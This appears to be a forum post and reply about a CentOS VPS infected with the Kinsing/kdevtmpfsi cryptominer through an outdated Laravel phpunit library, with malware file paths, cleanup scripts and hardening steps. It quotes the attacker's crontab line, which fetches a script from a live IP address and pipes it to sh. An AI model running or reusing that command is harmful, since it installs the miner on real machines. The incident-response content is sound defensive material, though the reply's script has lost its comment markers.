I've recently been hacked on my VPS(using Centos 7.6 and CWP up to date) and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and Memory:
kdevtmpfpsi
kinsing
Also, the user's crontab had this following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix
and /var/tmp/.ICEd-unix
folders created every hour and I can't figure out what it is.
- create a cron on root user that deletes and kills the processes:
#/bin/bash
rm -f /var/tmp/kinsing
rm -f /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -f /tmp/.ICEd-unix
killall -9 kdevtmpfsi
- remove the crontab line from the affected user
- remove all unnecessary opened ports in firewall
- disable shell access to the user(from CWP)
- update all services/projects to the latest possible versions available in your package manager
- Found these lines in
suexec.log
: https://imgur.com/yIliqjJ, therefore an exploit from phpunit. My libraries for the laravel project weren't up to date.
if the bash script aint worked as it expected because of **pidof ** command, you could try pgrep.
Basically your bash script should be like below
`#!/bin/bash
kinsing deleteing here
PID=$(pgrep kinsing)
echo "$PID"
kill -9 $PID
kdevtmpfsi deleteing here
PID=$(pgrep kdevtmpfsi)
echo "$PID"
kill -9 $PID
Delete malware files
find / -iname kdevtmpfsi -exec rm -fv {} ;
find / -iname kinsing -exec rm -fv {} ;
`